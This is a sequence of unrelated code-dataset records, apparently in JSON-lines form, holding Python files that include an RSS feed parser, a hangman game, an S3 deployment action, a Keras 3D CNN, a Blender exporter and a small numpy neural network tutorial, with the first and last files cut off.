content_type=\"application/rss+xml\")\n\ndef getFeedSharepoint(req,myFeed):\n c = {}\n try:\n c[\"BaseUrl\"] = config.get(\"active\", \"baseUrl\")\n c[\"CustomTitle\"] = myFeed[\"CustomTitle\"]\n c[\"CustomDescription\"] = myFeed[\"CustomDescription\"]\n c[\"id\"] = myFeed[\"_id\"]\n itemList = []\n fp = urllib.request.urlopen(myFeed[\"url\"])\n mybytes = fp.read()\n source = mybytes.decode(\"utf8\")\n allItems = re.findall(\"(.+?)\", source, re.DOTALL | re.IGNORECASE)\n for thisItem in allItems:\n thisItem = thisItem.replace(\"[<\", \"[\").replace('&amp;','&').replace('&','&').replace('amp;','&')\n itemToAdd = {}\n itemToAdd[\"Title\"] = re.findall(\"<!\\[CDATA\\[(.+?)\\]\\]>\", thisItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"Title\"]) == 0):\n itemToAdd[\"Title\"] = re.findall(\"(.+?)\", thisItem, re.DOTALL | re.IGNORECASE)\n itemToAdd[\"Title\"] = flatten(itemToAdd[\"Title\"])\n\n itemToAdd[\"ItemURL\"] = re.findall(\"(.+?)\", thisItem, re.DOTALL | re.IGNORECASE)\n try:\n itemToAdd[\"ItemURL\"] = flatten(itemToAdd[\"ItemURL\"])\n except:\n itemToAdd[\"ItemURL\"] = flatten(itemToAdd[\"ItemURL\"])\n \n\n itemToAdd[\"date\"] = re.findall(\"(.+?)\", thisItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"date\"]) == 0):\n itemToAdd[\"date\"] = re.findall(\"<(?:.*?)date>(.+?)\", thisItem, re.DOTALL | re.IGNORECASE)\n itemToAdd[\"date\"] = flatten(itemToAdd[\"date\"])\n itemToAdd[\"Description\"] = re.findall(\"\", thisItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"Description\"]) == 0):\n itemToAdd[\"Description\"] = re.findall(\"<(?:.*?)description>(.+?)\", thisItem,\n re.DOTALL | re.IGNORECASE)\n itemToAdd[\"Description\"] = flatten(itemToAdd[\"Description\"])\n itemToAdd[\"SourceURL\"] = re.findall(\"\", thisItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"SourceURL\"]) == 0):\n itemToAdd[\"SourceURL\"] = re.findall(\"(.*?)\", thisItem, re.DOTALL | re.IGNORECASE)\n itemToAdd[\"SourceURL\"] = flatten(itemToAdd[\"SourceURL\"])\n itemToAdd[\"SourceName\"] = re.findall(\"(.*?)\", thisItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"SourceName\"]) == 0):\n itemToAdd[\"SourceName\"] = re.findall(\"(.*?)\", thisItem, re.DOTALL | re.IGNORECASE)\n itemToAdd[\"SourceName\"] = flatten(itemToAdd[\"SourceName\"])\n itemList.append(itemToAdd)\n c[\"ItemList\"] = itemList\n 
return render(req, \"SharepointRSSTemplate.pyv\", c, content_type=\"text/xml\")\n except Exception as ex:\n c[\"message\"] = str(ex)\n return render(req, \"GetFeedMessage.pyv\", c, content_type=\"text/plain\")\n\ndef getCombineFeed(req,myFeed):\n c = {}\n try:\n sourceFeeds = myFeed[\"sourceFeeds\"]\n c[\"BaseUrl\"] = config.get(\"active\", \"baseUrl\")\n c[\"id\"] = myFeed[\"_id\"]\n itemList = []\n for o in sourceFeeds:\n fp = urllib.request.urlopen(o)\n mybytes = fp.read()\n CombineSource = mybytes.decode(\"utf8\")\n strainedItems = re.findall(\"(.+?)\", CombineSource,re.DOTALL|re.IGNORECASE)\n for thisItem in strainedItems:\n thisStrainedItem = str(thisItem)\n itemToAdd = {}\n itemToAdd[\"TitleA\"] = re.findall(\"<!\\[CDATA\\[(.+?)\\]\\]>\", thisItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"TitleA\"]) == 0):\n itemToAdd[\"TitleA\"] = re.findall(\"(.+?)\", thisItem, re.DOTALL | re.IGNORECASE)\n itemToAdd[\"ItemURL\"] = \"\"\n itemToAdd[\"ItemURLA\"] = re.findall(\"\",thisStrainedItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"ItemURLA\"]) == 0):\n itemToAdd[\"ItemURLA\"] = re.findall(\"(.+?)\", thisStrainedItem,re.DOTALL | re.IGNORECASE)\n itemToAdd[\"SourceName\"] = \"\"\n itemToAdd[\"SourceNameA\"] = re.findall(\"(.+?)\",thisStrainedItem,re.DOTALL|re.IGNORECASE)\n itemToAdd[\"SourceURL\"] = \"\"\n itemToAdd[\"SourceURLA\"] = re.findall(\"\", thisItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"SourceURLA\"]) == 0):\n itemToAdd[\"SourceURLA\"] = re.findall(\"(.*?)\", thisItem,re.DOTALL | re.IGNORECASE)\n itemToAdd[\"Date\"] = \"\"\n itemToAdd[\"DateA\"] = re.findall(\"(.+?)\", thisStrainedItem, re.DOTALL | re.IGNORECASE)\n itemToAdd[\"DateA\"] = flatten(itemToAdd[\"Date\"])\n if (len(itemToAdd[\"DateA\"]) == 0):\n itemToAdd[\"Date\"] = re.findall(\"<(?:.*?)Date>(.+?)\", thisItem,re.DOTALL | re.IGNORECASE)\n itemToAdd[\"DateA\"] = flatten(itemToAdd[\"Date\"])\n\n\n itemToAdd[\"Description\"] = \"\"\n itemToAdd[\"DescriptionA\"] = re.findall(\"\", thisStrainedItem, re.DOTALL | re.IGNORECASE)\n if (len(itemToAdd[\"DescriptionA\"]) == 0):\n itemToAdd[\"DescriptionA\"] = re.findall(\"(.+?)\", thisStrainedItem, re.DOTALL | re.IGNORECASE)\n if isinstance(itemToAdd[\"TitleA\"], list):\n if len(itemToAdd[\"TitleA\"])>0:\n itemToAdd[\"Title\"] = itemToAdd[\"TitleA\"][0]\n else:\n itemToAdd[\"Title\"] = \"\"\n else:\n itemToAdd[\"Title\"] = itemToAdd[\"TitleA\"]\n if isinstance(itemToAdd[\"ItemURLA\"], list):\n if len(itemToAdd[\"ItemURLA\"])>0:\n itemToAdd[\"ItemURL\"] = itemToAdd[\"ItemURLA\"][0]\n else:\n itemToAdd[\"ItemURL\"] = \"\"\n else:\n itemToAdd[\"ItemURL\"] = itemToAdd[\"ItemURLA\"]\n if isinstance(itemToAdd[\"SourceNameA\"], list):\n if len(itemToAdd[\"SourceNameA\"])>0:\n itemToAdd[\"SourceName\"] = itemToAdd[\"SourceNameA\"][0]\n else:\n itemToAdd[\"SourceName\"] = \"\"\n else:\n itemToAdd[\"SourceName\"] = itemToAdd[\"SourceNameA\"]\n if isinstance(itemToAdd[\"SourceURLA\"], list):\n if len(itemToAdd[\"SourceURLA\"])>0:\n itemToAdd[\"SourceURL\"] = itemToAdd[\"SourceURLA\"][0]\n else:\n itemToAdd[\"SourceURL\"] = \"\"\n else:\n itemToAdd[\"SourceURL\"] = itemToAdd[\"SourceURLA\"]\n \n if isinstance(itemToAdd[\"DateA\"], list):\n if (len(itemToAdd[\"DateA\"])>0):\n itemToAdd[\"Date\"] = itemToAdd[\"DateA\"][0]\n else:\n itemToAdd[\"Date\"] = \"\"\n else:\n itemToAdd[\"Date\"] = itemToAdd[\"DateA\"]\n\n if isinstance(itemToAdd[\"DescriptionA\"], list):\n if len(itemToAdd[\"DescriptionA\"])>0:\n itemToAdd[\"Description\"] = itemToAdd[\"DescriptionA\"][0]\n 
else:\n itemToAdd[\"Description\"] = \"\"\n else:\n itemToAdd[\"Description\"] = itemToAdd[\"DescriptionA\"]\n itemList.append(itemToAdd)\n c[\"ItemList\"] = itemList\n return render(req, \"CombineRSSTemplate.pyv\", c, content_type=\"text/xml\")\n except Exception as ex:\n c[\"message\"] = str(ex)\n return render(req, \"GetFeedMessage.pyv\", c, content_type=\"text/plain\")\n\ndef flatten(arrayIn):\n if len(arrayIn)>0 :\n return arrayIn[0]\n else:\n return \"\"\n\n\n\n\n\n\n","sub_path":"mwfeeds/controlers/GetFeed.py","file_name":"GetFeed.py","file_ext":"py","file_size_in_byte":11946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"60607136","text":"#Store Hangman game into a function\nimport random\n\ndef hangman():\n\tword = [\"test\", \"idea\", \"something\", \"else\", \"random\", \"things\"]\n\tword = random.choice(word)\n\n\twrong = 0\n\tstages = [\"\",\n\t\t\t\"--------- \",\n\t\t\t\"| | \",\n\t\t\t\"| | \",\n\t\t\t\"| 0 \",\n\t\t\t\"| /|\\\\ \",\n\t\t\t\"| / \\\\ \",\n\t\t\t\"| \"\n\t\t\t]\n\tremaining_letters = list(word)\n\tboard = [\"_\"] * len(word)\n\twin = False\n\tprint(\"Welcome to Hangman\")\n\t\n\twhile wrong < len(stages) - 1:\n\t\tprint(\"\\n\")\n\t\tmsg = \"Guess a letter: \"\n\t\tchar = input(msg)\n\t\tif char in remaining_letters:\n\t\t\tcind = remaining_letters.index(char)\n\t\t\tboard[cind] = char\n\t\t\tremaining_letters[cind] = '$'\n\t\telse:\n\t\t\twrong += 1\n\t\tprint((\" \".join(board)))\n\t\te = wrong + 1\n\t\tprint(\"\\n\".join(stages[0: 3]))\n\t\tif \"_\" not in board:\n\t\t\tprint(\"You win!\")\n\t\t\tprint(\" \".join(board))\n\t\t\twin = True\n\t\t\tbreak\n\tif not win:\n\t\tprint(\"\\n\".join(stages[0: wrong]))\n\t\tprint(\"You lose! It was {}.\".format(word))\n\nhangman()\n\n","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"404910387","text":"import os\nimport boto3\nimport mimetypes\nfrom botocore.config import Config\n\n\ndef run():\n bucket = os.environ['INPUT_BUCKET']\n bucket_region = os.environ['INPUT_BUCKET-REGION']\n dist_folder = os.environ['INPUT_DIST-FOLDER']\n\n configuration = Config(region_name=bucket_region)\n\n # s3_client = boto3.client('s3', config=configuration)\n\n # for root, subdirs, files in os.walk(dist_folder):\n # for file in files:\n # s3_client.upload_file(\n # os.path.join(root, file),\n # bucket,\n # os.path.join(root, file).replace(dist_folder + '/', ''),\n # ExtraArgs={\"ContentType\": mimetypes.guess_type(file)[0]}\n # )\n\n website_url = f'http://{bucket}.s3-website-{bucket_region}.amazonaws.com'\n # The below code sets the 'website-url' output (the old ::set-output syntax isn't supported anymore - that's the only thing that changed though)\n with open(os.environ['GITHUB_OUTPUT'], 'a') as gh_output:\n print(f'web-url={website_url}', file=gh_output)\n\n\nif __name__ == '__main__':\n run()\n","sub_path":".github/actions/deploy-s3-docker/deployment.py","file_name":"deployment.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"583815220","text":"from django.core.paginator import Paginator\n\n\nclass PaginatorMixin():\n queryset = None\n per_page = None\n filterset = None\n request = None\n\n def __init__(self, queryset, filterset, request):\n \"\"\"Initialization\"\"\"\n self.queryset = queryset\n self.filterset = filterset\n 
self.request = request\n\n def set_per_page(self, per_page):\n \"\"\"Set the number of rows per page\"\"\"\n self.per_page = per_page\n\n def get_queryset(self):\n \"\"\"Get the filtered queryset\"\"\"\n return self.filterset(self.request.GET, queryset=self.queryset)\n\n def get_page(self):\n \"\"\"Get the page number from request and remove the page\n query string\"\"\"\n page = self.request.GET.get('page')\n request_without_page = self.request.GET.copy()\n if page:\n request_without_page.pop('page')\n self.request.GET = request_without_page \n return page\n\n def get_paginator(self):\n \"\"\"Get the filtered list and paginator resources\"\"\"\n object_list = self.get_queryset()\n paginator = Paginator(object_list.qs, self.per_page)\n page = self.get_page()\n\n object_list._qs = paginator.get_page(page)\n\n page_range = range(1, paginator.num_pages +1)\n page_list = list(page_range)\n\n return {'object_list': object_list, 'page_list': page_list, 'request': self.request}","sub_path":"intranet/core/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"234027627","text":"#!/usr/bin/env python\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n# QEcalc by DANSE Inelastic group\n# Nikolay Markovskiy\n# California Institute of Technology\n# (C) 2009 All Rights Reserved\n#\n# File coded by: Nikolay Markovskiy\n#\n# See AUTHORS.txt for a list of people who contributed.\n# See LICENSE.txt for license information.\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nimport os.path\nimport StringIO\n\nclass SubSetting:\n def __init__(self): pass\n\nclass Setting:\n def __init__(self, filename = None, configString = None):\n self._paths = SubSetting()\n try:\n if filename == None:\n if configString == None:\n raise NameError(\"Config should be initialized either with a \\\n filename or configString\")\n else:\n self.filename = None #StringIO.StringIO(configString)\n self.configString = configString\n else:\n self.filename = filename\n self.configString = open(filename,'r').read()\n except NameError:\n raise \n\n \n def section(self, sectionName, configDic = {}):\n \"\"\"\n will parse self.configFileName values not found in the file will be\n initialized from configDic\n \"\"\"\n import ConfigParser\n config = ConfigParser.SafeConfigParser()\n config.optionxform = str\n \n file = StringIO.StringIO(self.configString)\n config.readfp(file)\n \n if not config.has_section(sectionName):\n config.add_section(sectionName)\n\n for varName in configDic.keys():\n if varName not in dir(self):\n setattr(self, varName, configDic[varName])\n\n for option in config.options(sectionName):\n varValue = config.get(sectionName, option)\n setattr(self, option, varValue)\n\n Vars = dir(self)\n for varName in Vars:\n if 'input' in varName or 'Input' in varName:\n if os.path.isfile(varName):\n file = open(varName, 'r')\n string = file.read()\n setattr(self, '_'+varName+'Str', string)\n\n def set(self, name, value):\n setattr(self, name, value)\n\n def get(self, name):\n if name in dir(self) and getattr(self,name) != None:\n return getattr(self,name)\n else:\n if name in dir(self._paths):\n return getattr(self._paths, name)\n else:\n return None\n\n def syncAllPathsInNamelist(self, param, namelist, varName, input, defaults = None):\n \"\"\"\n Syncs path attribute in namelist with setting variable varName\n if varName was not set in 
Setting it will be initialized from QE\n        input. If it is not in QE input it will be initialized from QE default\n        values\n        \"\"\"\n        var = getattr(self, varName, None)\n        if var != None:\n            input.namelist(namelist).add(param, var, quotes = True)\n            setattr(self._paths, varName, var)\n        else:\n            if input.namelist(namelist).exists(param):\n                inputVar = input.namelist(namelist).param(param, quotes = False)\n                setattr(self, varName, inputVar)\n                setattr(self._paths, varName, inputVar)\n            else:\n                setattr(self, varName, defaults[varName])\n                setattr(self._paths, varName, defaults[varName])\n\n    def getAllPathsInNamelist(self, param, namelist, varName, input, defaults = None):\n        \"\"\"\n        Retrieves all the filenames relevant to given namelist. Variables\n        from class Setting override ones from QE input files. If both are\n        empty, default values are used\n        \"\"\"\n        var = getattr(self, varName, None)\n        fileDict = {}\n        if var != None:\n            fileDict[param] = var\n        else:\n            if input.namelist(namelist).exists(param):\n                fileDict[param] = input.namelist(namelist).param(param, \\\n                                                                quotes = False)\n            else:\n                fileDict[param] = defaults[varName]\n        return fileDict\n\n    def syncPathInNamelist(self, param, namelist, varName, input, defaults = None):\n        \"\"\"\n        Syncs path attribute in namelist with setting variable varName\n        \"\"\"\n        var = getattr(self, varName, None)\n        if var != None:\n            input.namelist(namelist).add(param, var, quotes = True)\n            setattr(self._paths, varName, var)\n        else:\n            if input.namelist(namelist).exists(param):\n                inputVar = input.namelist(namelist).param(param, quotes = False)\n                setattr(self._paths, varName, inputVar)\n            else:\n                setattr(self._paths, varName, defaults[varName])","sub_path":"espresso/tags/qecalc-0.2.2/qecalc/qetask/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":5045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"20701008","text":"from __future__ import print_function\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Convolution3D, MaxPooling3D\nfrom keras.optimizers import SGD\n\nmodel = Sequential()\n# input: 3D volumes with shape (None, 20, 50, 50).\n# this applies 32 convolution filters of size 3x3x3 each.\nmodel.add(Convolution3D(32, 3, 3, 3, border_mode='valid', input_shape=(None, 20, 50, 50)))\nmodel.add(Activation('relu'))\nmodel.add(Convolution3D(32, 3, 3, 3))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling3D(pool_size=(2, 2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Convolution3D(64, 3, 3, 3, border_mode='valid'))\nmodel.add(Activation('relu'))\nmodel.add(Convolution3D(64, 3, 3, 3))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling3D(pool_size=(2, 2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\n# Note: Keras does automatic shape inference.\nmodel.add(Dense(256))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(10))\nmodel.add(Activation('softmax'))\n\nsgd = SGD(lr=0.1, decay=1e-6, momentum=0.9, nesterov=True)\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd)\n\nX_train = np.load('../images.npy')\nY_train = np.load('../labels.npy')\n\nmodel.fit(X_train, Y_train, batch_size=2, nb_epoch=1)\n","sub_path":"DataScienceBowl/scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"324484281","text":"# vim:ts=4:et\n# ##### BEGIN 
GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\nimport bpy\nfrom mathutils import Vector, Quaternion\n\nfrom .. import properties\nfrom ..mu import Mu\nfrom ..mu import MuObject, MuTransform, MuTagLayer\nfrom ..utils import strip_nnn\n\nfrom .animation import collect_animations, find_path_root, make_animations\nfrom .collider import make_collider\nfrom .cfgfile import generate_cfg\nfrom .volume import model_volume\n\ndef make_transform(obj):\n transform = MuTransform()\n transform.name = strip_nnn(obj.name)\n transform.localPosition = Vector(obj.location)\n if obj.rotation_mode != 'QUATERNION':\n transform.localRotation = obj.rotation_euler.to_quaternion()\n else:\n transform.localRotation = Quaternion(obj.rotation_quaternion)\n transform.localScale = Vector(obj.scale)\n return transform\n\ndef make_tag_and_layer(obj):\n tl = MuTagLayer()\n tl.tag = obj.muproperties.tag\n tl.layer = obj.muproperties.layer\n return tl\n\ntype_handlers = {} # filled in by the modules that handle the obj.data types\nexported_objects = set()\n\ndef is_collider(obj):\n muprops = obj.muproperties\n if muprops.collider and muprops.collider != 'MU_COL_NONE':\n return True\n return False\n\ndef find_single_collider(objects):\n colliders = []\n for o in objects:\n if is_collider(o):\n colliders.append(o)\n if len(colliders) == 1:\n mat = colliders[0].matrix_local\n if mat == mat.Identity(4):\n return colliders[0]\n return None\n\ndef make_obj_core(mu, obj, path, muobj):\n if path:\n path += \"/\"\n path += muobj.transform.name\n mu.object_paths[path] = muobj\n muobj.tag_and_layer = make_tag_and_layer(obj)\n if is_collider(obj):\n exported_objects.add(obj)\n muobj.collider = make_collider(mu, obj)\n return muobj\n elif type(obj.data) in type_handlers:\n mu.path = path #needs to be reset as a type handler might modify it\n muobj = type_handlers[type(obj.data)](obj, muobj, mu)\n if not muobj:\n # the handler decided the object should not be exported\n return None\n exported_objects.add(obj)\n col = find_single_collider(obj.children)\n if col:\n exported_objects.add(col)\n muobj.collider = make_collider(mu, col)\n for o in obj.children:\n if o in exported_objects:\n # the object has already been exported\n continue\n muprops = o.muproperties\n #check whether the object should be exported (eg, props should not be\n #exported as part of an IVA, and IVAs should not be exported as part\n #of a part (that sounds odd)\n if muprops.modelType in mu.special:\n if mu.special[muprops.modelType](mu, o):\n continue\n child = make_obj(mu, o, path)\n if child:\n muobj.children.append(child)\n return muobj\n\ndef make_obj(mu, obj, path):\n if obj in exported_objects:\n # the object has already been \"exported\"\n return None\n muobj = MuObject()\n muobj.transform = make_transform (obj)\n return 
make_obj_core(mu, obj, path, muobj)\n\ndef add_internal(mu, obj):\n if not mu.internal:\n mu.internal = obj\n return True\n\ndef add_prop(mu, obj):\n mu.props.append(obj)\n return True\n\nspecial_modelTypes = {\n 'NONE': {},\n 'PART': {'INTERNAL':add_internal},\n 'PROP': {},\n 'INTERNAL': {'PROP':add_prop},\n}\n\ndef export_object(obj, filepath):\n exported_objects.clear()\n animations = collect_animations(obj)\n anim_root = find_path_root(animations)\n mu = Mu()\n mu.name = strip_nnn(obj.name)\n mu.object_paths = {}\n mu.materials = {}\n mu.textures = {}\n mu.nodes = []\n mu.props = []\n mu.messages = []\n mu.internal = None\n mu.type = obj.muproperties.modelType\n mu.CoMOffset = None\n mu.CoPOffset = None\n mu.CoLOffset = None\n mu.inverse = obj.matrix_world.inverted()\n mu.special = special_modelTypes[mu.type]\n mu.obj = make_obj(mu, obj, \"\")\n mu.materials = list(mu.materials.values())\n mu.materials.sort(key=lambda x: x.index)\n mu.textures = list(mu.textures.values())\n mu.textures.sort(key=lambda x: x.index)\n if anim_root and anim_root in mu.object_paths:\n anim_root_obj = mu.object_paths[anim_root]\n anim_root_obj.animation = make_animations(mu, animations, anim_root)\n mu.write(filepath)\n mu.skin_volume, mu.ext_volume = model_volume(obj)\n generate_cfg(mu, filepath)\n return mu\n","sub_path":"All_In_One/addons/io_object_mu/export_mu/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":5248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"425339717","text":"# Free test configuration file for MessageLogger service:\n# Behavior implied by S. Naumann but unexpected on our part.\n\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"TEST\")\n\nimport FWCore.Framework.test.cmsExceptionsFatal_cff\nprocess.options = FWCore.Framework.test.cmsExceptionsFatal_cff.options\n\nprocess.load(\"FWCore.MessageService.test.Services_cff\")\n\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.threshold = 'INFO'\nprocess.MessageLogger.cerr.INFO = cms.untracked.PSet(\n default = cms.untracked.PSet( limit = cms.untracked.int32( 0)\n),\n expect_specific = cms.untracked.PSet( limit = cms.untracked.int32(-1)\n),\n)\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(2)\n)\n\nprocess.source = cms.Source(\"EmptySource\")\n\nprocess.sendSomeMessages = cms.EDAnalyzer( \"UnitTestClient_E\")\n\nprocess.p = cms.Path(process.sendSomeMessages)\n","sub_path":"FWCore/MessageService/test/t1_cfg.py","file_name":"t1_cfg.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"224066157","text":"import random\n\ndef rnd():\n\treturn (random.randint(10, 25))\n\nschool = { \"1a\": rnd(), \"1b\": rnd(), \"2a\": rnd(), \"2b\": rnd(), \"3a\": rnd(),\n\t\t\t\"3b\": rnd(), \"4a\": rnd(), \"4b\": rnd(), \"5a\": rnd(), \"5b\": rnd() }\n\nprint (school[\"1a\"], \" children in 1a class\")\n\ndel(school[\"1a\"])\n\nschool[\"2a\"] = rnd()\nschool[\"3a\"] = rnd()\nschool[\"4a\"] = rnd()\n\nschool[\"6a\"] = rnd()\nschool[\"6b\"] = rnd()\n\nprint (school)\n","sub_path":"lab21.py","file_name":"lab21.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"494717574","text":"import numpy as np\n\n\n# sigmoid function\ndef nonlin(x, deriv=False):\n if deriv:\n return x * (1 - x) # formula for derivative of output 
of sigmoid\n return 1 / (1 + np.exp(-x))\n\n\n##############################\n# 2 Layer Neural Network\n##############################\ndef two_layer_nn():\n # input dataset\n X = np.array([[0, 0, 1],\n [0, 1, 1],\n [1, 0, 1],\n [1, 1, 1]\n ])\n\n # outputs (original)\n y = np.array([[0, 0, 1, 1]]).T # transpose to make it a row vector\n\n # seed random values to get decent same results every time\n np.random.seed(1)\n\n # initialize weights randomly\n syn0 = 2 * np.random.random((3, 1)) - 1\n\n for i in range(10):\n # forward propagation\n l0 = X\n l1 = nonlin(np.dot(X, syn0)) # make the prediction of output\n\n # Loss estimation\n l1_error = y - l1 # calculate error, your loss function\n\n # gradient descent\n l1_delta = l1_error * nonlin(l1, True) # multiplying element-wise\n\n # update weights\n syn0 += np.dot(l0.T, l1_delta)\n\n if i % 1 == 0:\n print(f\"iteration {i}: \\nOutput {l1}\")\n\n # print(\"Output After Training\")\n # print(l1)\n\n\n##############################\n# 3 Layer Neural Network\n##############################\ndef three_layer_nn():\n # inputs\n X = np.array([\n [0, 0, 1],\n [0, 1, 1],\n [1, 0, 1],\n [1, 1, 1]])\n\n # outputs\n # y = np.array([[0, 1, 1, 0]]).T\n y = np.array([[0], [1], [1], [0]])\n\n # set random seed and initialize weights\n np.random.seed(1)\n\n # weights of two different layers\n # randomly initialize with mean 0\n syn0 = 2 * np.random.random((3, 4)) - 1\n syn1 = 2 * np.random.random((4, 1)) - 1\n\n for i in range(60000):\n # feed forward\n l0 = X\n # l1 = nonlin(np.dot(X, syn0))\n l1 = nonlin(np.dot(l0, syn0))\n l2 = nonlin(np.dot(l1, syn1))\n\n # calculate error\n out_error = y - l2\n\n #############################################\n # MY METHOD\n #############################################\n # wrong back propagate\n # error_deriv = nonlin(out_error, deriv=True)\n # l0_error = l1 * error_deriv\n # l1_error = l2 * error_deriv\n\n # update weights\n # syn0 += np.dot(l0.T, l0_error)\n # syn1 += np.dot(l1.T, l1_error)\n\n #############################################\n # Reference Method\n #############################################\n l2_delta = out_error * nonlin(l2, True)\n\n # how much each value contributes to error\n # back propagation\n l1_error = l2_delta.dot(syn1.T)\n\n # now go for first layer eror\n l1_delta = l1_error * nonlin(l1, True)\n\n syn1 += l1.T.dot(l2_delta)\n syn0 += l0.T.dot(l1_delta)\n\n print(\"Output After Training\")\n print(l2)\n\n\ntwo_layer_nn()\n# three_layer_nn()\n","sub_path":"part1/x_neuralnetwork.py","file_name":"x_neuralnetwork.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"19901161","text":"import numpy\nimport os\nimport csv\nfrom pandas import read_csv\nfrom datetime import datetime, timedelta\nfrom pandas import DatetimeIndex, to_datetime\nimport time\nfrom subprocess import call\nimport re\nimport datetime\nimport windowCreator\nfrom random import shuffle\nimport Logger\n\n############################################\n\nCOMPRESSED_HISTORY_FILE = 'D:\\\\dukascopy_history\\\\EURUSD-2016_01_01-2017_08_14.csv.npz'\nRESULT_FILE = 'C:\\\\dukascopy_input\\\\EURUSD-2016_01_01-2017_08_14-evaluation'\nNUMBER_OF_VALIDATION_DAYS = 21 # average number of work days in month\n#NUMBER_OF_VALIDATION_DAYS = 1\n\n############################################\n\ndef loadCompressedHistory():\n loggerToken = Logger.phaseLogStart('Loading compressed history')\n\n history = numpy.load(COMPRESSED_HISTORY_FILE)['arr_0']\n\n 
enumeratedHistoryFeatures = ['timestamp', 'month', 'dayOfMonth', 'dayOfWeek', 'timeOfDay', 'ask', 'bid', 'askVolume', 'bidVolume']\n\n    Logger.phaseLogEnd(loggerToken)\n\n    return history, enumeratedHistoryFeatures\n\ndef trimHistoryToEvaluationDaysOnly(history):\n    loggerToken = Logger.phaseLogStart('Trimming history')\n\n    trainDays = history[-NUMBER_OF_VALIDATION_DAYS :]\n\n    Logger.phaseLogEnd(loggerToken)\n\n    return trainDays\n\ndef prepareEvaluationHistory():\n    history, enumeratedHistoryFeatures = loadCompressedHistory()\n\n    history = trimHistoryToEvaluationDaysOnly(history)\n\n    return numpy.array(history.tolist()), enumeratedHistoryFeatures\n\n#def extractWindows(history):\n#    loggerToken = Logger.phaseLogStart('Extracting windows')\n\n#    allWindows = []\n\n#    for historyDay in history:\n#        index = 0\n\n#        while True:\n#            window = windowCreator.createWindow(historyDay, index)\n\n#            if window is None:\n#                break;\n\n#            print(window[1])\n\n#            index = index + 1\n\n#            allWindows.append(window)\n\n#    Logger.phaseLogEnd(loggerToken)\n\n#    return numpy.array(allWindows)\n\ndef extractWindows(history, enumeratedHistoryFeatures):\n    loggerToken = Logger.phaseLogStart('Extracting windows')\n\n    features = ['ask', 'bid']\n\n    allowedOverlap = 0 # no overlap\n\n    windowWidth = 30 * 60 * 1000 # 30 minutes\n\n    predictionRange = 5 * 1000 # 5 seconds\n\n    allWindows = windowCreator.createWindows(history, enumeratedHistoryFeatures, allowedOverlap, features, windowWidth, predictionRange)\n\n    Logger.phaseLogEnd(loggerToken)\n\n    return allWindows\n\ndef storeResult(windows):\n    loggerToken = Logger.phaseLogStart('Storing result on disk')\n\n    numpy.save(RESULT_FILE, windows)\n\n    Logger.phaseLogEnd(loggerToken)\n\n############################################\n\nloggerToken = Logger.phaseLogStart('Preparing evaluation input')\n\nhistory, enumeratedHistoryFeatures = prepareEvaluationHistory()\n\nevaluationWindows = extractWindows(history, 